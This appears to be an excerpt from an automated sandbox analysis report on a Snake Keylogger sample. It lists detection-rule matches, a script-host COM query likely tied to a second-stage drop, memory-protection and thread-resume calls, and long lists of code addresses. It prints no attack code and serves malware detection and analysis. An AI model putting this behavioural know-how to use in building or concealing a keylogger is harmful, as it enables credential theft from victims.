                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.LAQfpnQvPQ.exe.41c8bb8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000005.00000002.2515782521.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: 00000003.00000002.3312271782.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000005.00000002.2515782521.0000000004228000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000000.00000002.2236686553.00000000041C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: LAQfpnQvPQ.exe PID: 5144, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: Process Memory Space: LAQfpnQvPQ.exe PID: 6364, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: ishon.exe PID: 2888, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069FEF98 NtResumeThread,0_2_069FEF98
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069FEF90 NtResumeThread,0_2_069FEF90
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077FE8B8 NtProtectVirtualMemory,0_2_077FE8B8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077FE8B0 NtProtectVirtualMemory,0_2_077FE8B0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0769CF98 NtProtectVirtualMemory,5_2_0769CF98
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0769F430 NtResumeThread,5_2_0769F430
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0769CF91 NtProtectVirtualMemory,5_2_0769CF91
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0769F428 NtResumeThread,5_2_0769F428
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_017ECB140_2_017ECB14
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_017EF3B80_2_017EF3B8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_017EF3A80_2_017EF3A8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069F06B80_2_069F06B8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069FA4300_2_069FA430
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069F59400_2_069F5940
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069FA4200_2_069FA420
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069FA5DE0_2_069FA5DE
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069F7A280_2_069F7A28
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069F7A230_2_069F7A23
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069FF8580_2_069FF858
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_069FF8680_2_069FF868
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_0759EF180_2_0759EF18
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_07590DD80_2_07590DD8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_07590DCA0_2_07590DCA
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_0759135E0_2_0759135E
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_075913080_2_07591308
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_075D4A700_2_075D4A70
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_075D76C30_2_075D76C3
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_075D5D500_2_075D5D50
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_075DC9F80_2_075DC9F8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_075DC9EA0_2_075DC9EA
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_075D10C80_2_075D10C8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_075D10B80_2_075D10B8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_0762C5C00_2_0762C5C0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_076244E80_2_076244E8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_07623A200_2_07623A20
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_076249F10_2_076249F1
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_0762D6200_2_0762D620
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_0762D6100_2_0762D610
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_0762C5B10_2_0762C5B1
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_07623A100_2_07623A10
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_076232E80_2_076232E8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_076232D80_2_076232D8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077503C90_2_077503C9
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077506FF0_2_077506FF
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077515E00_2_077515E0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077FB5080_2_077FB508
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077FC3500_2_077FC350
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077F49780_2_077F4978
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077F39400_2_077F3940
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077FB4F80_2_077FB4F8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077F49690_2_077F4969
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077F39300_2_077F3930
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077FD9B80_2_077FD9B8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077FD9A70_2_077FD9A7
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077F30D00_2_077F30D0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_077F30C30_2_077F30C3
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_07AA00360_2_07AA0036
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 0_2_07AA00400_2_07AA0040
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D2B3383_2_02D2B338
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D2F0173_2_02D2F017
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D2C1A03_2_02D2C1A0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D261203_2_02D26120
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D246D93_2_02D246D9
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D2B7E23_2_02D2B7E2
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D267483_2_02D26748
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D2C7623_2_02D2C762
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D2C4803_2_02D2C480
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D2CA423_2_02D2CA42
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D298683_2_02D29868
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D2BEC03_2_02D2BEC0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D235723_2_02D23572
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D2B5023_2_02D2B502
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D2E5383_2_02D2E538
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_02D2E5273_2_02D2E527
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEC9D83_2_05AEC9D8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEBD383_2_05AEBD38
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEB0A03_2_05AEB0A0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AED0283_2_05AED028
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEA4083_2_05AEA408
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEC3883_2_05AEC388
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE8B583_2_05AE8B58
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEB6E83_2_05AEB6E8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE86083_2_05AE8608
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AED6703_2_05AED670
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEAA583_2_05AEAA58
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE11A03_2_05AE11A0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE81A03_2_05AE81A0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE81B03_2_05AE81B0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE518A3_2_05AE518A
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE51983_2_05AE5198
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE11913_2_05AE1191
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE85FC3_2_05AE85FC
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEC9C83_2_05AEC9C8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEBD2B3_2_05AEBD2B
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE0D393_2_05AE0D39
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE79003_2_05AE7900
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE0D483_2_05AE0D48
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE7D483_2_05AE7D48
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE7D583_2_05AE7D58
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE74A83_2_05AE74A8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE28B03_2_05AE28B0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE04883_2_05AE0488
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE04983_2_05AE0498
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE74973_2_05AE7497
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEB0903_2_05AEB090
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE08E03_2_05AE08E0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE08F03_2_05AE08F0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE78F03_2_05AE78F0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE44303_2_05AE4430
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE28093_2_05AE2809
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE00063_2_05AE0006
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE28073_2_05AE2807
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AED0183_2_05AED018
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE00403_2_05AE0040
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE70403_2_05AE7040
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE70503_2_05AE7050
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE33A83_2_05AE33A8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE33B83_2_05AE33B8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEA3F83_2_05AEA3F8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE6BC13_2_05AE6BC1
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE6BD03_2_05AE6BD0
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE63203_2_05AE6320
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE37303_2_05AE3730
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE63103_2_05AE6310
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE676A3_2_05AE676A
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE67783_2_05AE6778
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEC3783_2_05AEC378
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE5EB83_2_05AE5EB8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE5EC83_2_05AE5EC8
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEB6D93_2_05AEB6D9
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE56093_2_05AE5609
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE56183_2_05AE5618
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AED6623_2_05AED662
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE5A603_2_05AE5A60
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AE5A703_2_05AE5A70
                      Source: C:\Users\user\Desktop\LAQfpnQvPQ.exeCode function: 3_2_05AEAA483_2_05AEAA48
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0134CB145_2_0134CB14
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0134F3B85_2_0134F3B8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0134F3A85_2_0134F3A8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07430DCA5_2_07430DCA
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07430DD85_2_07430DD8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074313585_2_07431358
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07497BDB5_2_07497BDB
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07494B885_2_07494B88
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074962385_2_07496238
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074900405_2_07490040
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0749CF105_2_0749CF10
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074911D05_2_074911D0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074911E05_2_074911E0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074C36185_2_074C3618
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074C45F55_2_074C45F5
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074CC5B85_2_074CC5B8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074C40E05_2_074C40E0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074C36085_2_074C3608
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074CD6085_2_074CD608
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074CD6185_2_074CD618
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074C2ED05_2_074C2ED0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074C2EE05_2_074C2EE0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_074CC5AD5_2_074CC5AD
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_075F03C95_2_075F03C9
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_075F06FF5_2_075F06FF
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_075F15E05_2_075F15E0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0762A6C05_2_0762A6C0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07625BD05_2_07625BD0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0762A6B05_2_0762A6B0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_076205485_2_07620548
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07627CB25_2_07627CB2
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07627CB85_2_07627CB8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0762E1E85_2_0762E1E8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0762E1D95_2_0762E1D9
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0762A86E5_2_0762A86E
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07699BE85_2_07699BE8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07693BD05_2_07693BD0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0769AA305_2_0769AA30
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_076930105_2_07693010
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_07699BD85_2_07699BD8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_076930005_2_07693000
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0769C0885_2_0769C088
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_0769C0985_2_0769C098
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_079400365_2_07940036
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 5_2_079400405_2_07940040
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_015561087_2_01556108
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0155C1907_2_0155C190
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0155F0077_2_0155F007
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0155B3287_2_0155B328
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0155C4707_2_0155C470
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0155C7527_2_0155C752
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_015598587_2_01559858
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_015568807_2_01556880
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0155BBD27_2_0155BBD2
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0155CA327_2_0155CA32
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_01554AD97_2_01554AD9
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0155BEB07_2_0155BEB0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_015535727_2_01553572
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0155E5177_2_0155E517
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0155E5287_2_0155E528
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_0155B4F27_2_0155B4F2
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBB6E87_2_06BBB6E8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB86087_2_06BB8608
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBD6707_2_06BBD670
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBA4087_2_06BBA408
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBBD387_2_06BBBD38
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBAA587_2_06BBAA58
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBC3887_2_06BBC388
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB63207_2_06BB6320
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB8B587_2_06BB8B58
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBB0A07_2_06BBB0A0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBD0287_2_06BBD028
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB11A07_2_06BB11A0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBC9D87_2_06BBC9D8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB5EB87_2_06BB5EB8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBB6D97_2_06BBB6D9
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB5EC87_2_06BB5EC8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB56187_2_06BB5618
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB560A7_2_06BB560A
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBD6627_2_06BBD662
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB37307_2_06BB3730
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB67787_2_06BB6778
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB676A7_2_06BB676A
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB74A87_2_06BB74A8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB04987_2_06BB0498
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB74977_2_06BB7497
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB04887_2_06BB0488
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB44307_2_06BB4430
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB85FF7_2_06BB85FF
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB0D397_2_06BB0D39
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBBD287_2_06BBBD28
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB7D587_2_06BB7D58
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB0D487_2_06BB0D48
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB7D487_2_06BB7D48
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB5A707_2_06BB5A70
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB5A607_2_06BB5A60
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBAA487_2_06BBAA48
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB33B87_2_06BB33B8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB33A87_2_06BB33A8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBA3F87_2_06BBA3F8
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB6BD07_2_06BB6BD0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB6BC17_2_06BB6BC1
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB63127_2_06BB6312
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBC3787_2_06BBC378
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB28B07_2_06BB28B0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB08F07_2_06BB08F0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB78F07_2_06BB78F0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB08E07_2_06BB08E0
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BBD0187_2_06BBD018
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB28097_2_06BB2809
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB28077_2_06BB2807
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB00067_2_06BB0006
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB70507_2_06BB7050
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB00407_2_06BB0040
                      Source: C:\Users\user\AppData\Roaming\ishon.exeCode function: 7_2_06BB70477_2_06BB7047
